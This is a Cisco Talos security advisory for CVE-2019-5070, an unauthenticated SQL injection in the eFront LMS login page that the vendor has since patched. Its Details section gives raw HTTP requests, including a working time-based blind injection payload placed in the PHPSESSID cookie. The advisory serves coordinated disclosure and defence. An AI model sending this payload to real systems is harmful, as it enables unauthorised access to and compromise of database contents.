Headline
CVE-2019-5070: TALOS-2019-0859 || Cisco Talos Intelligence Group
An exploitable SQL injection vulnerability exists in the unauthenticated portion of eFront LMS, versions v5.2.12 and earlier. Specially crafted web request to login page can cause SQL injections, resulting in data compromise. An attacker can use a browser to trigger these vulnerabilities, and no special tools are required.
Summary
An exploitable SQL injection vulnerability exists in the unauthenticated portion of eFront LMS, versions v5.2.12 and earlier. Specially crafted web request to login page can cause SQL injections, resulting in data compromise. An attacker can use a browser to trigger these vulnerabilities, and no special tools are required.
Tested Versions
Epignosis eFront LMS v5.2.12
Product URLs
https://www.efrontlearning.com/
CVSSv3 Score
6.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
CWE
CWE-89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)
Details
The following parameters are vulnerable to unauthenticated SQL injection attacks:
PHPSessionID parameter:
GET / HTTP/1.1
Host: [IP]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSIDfb411=aaaaaaaaa%00'[SQL INJECTION]
Upgrade-Insecure-Requests: 1
PoC:
GET / HTTP/1.1
Host: [IP]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSIDfb411=bbbbbb%00' AND (SELECT 1 FROM (SELECT(SLEEP(8)))a) AND '1'='1
Upgrade-Insecure-Requests: 1
Timeline
2019-07-29 - Vendor disclosure
2019-07-31 - Vendor acknowledged issues under review
2019-08-13 - Vendor acknowledged work to fix issues & testing
2019-08-30 - Vendor patched/released new version
2019-09-03 - Public disclosure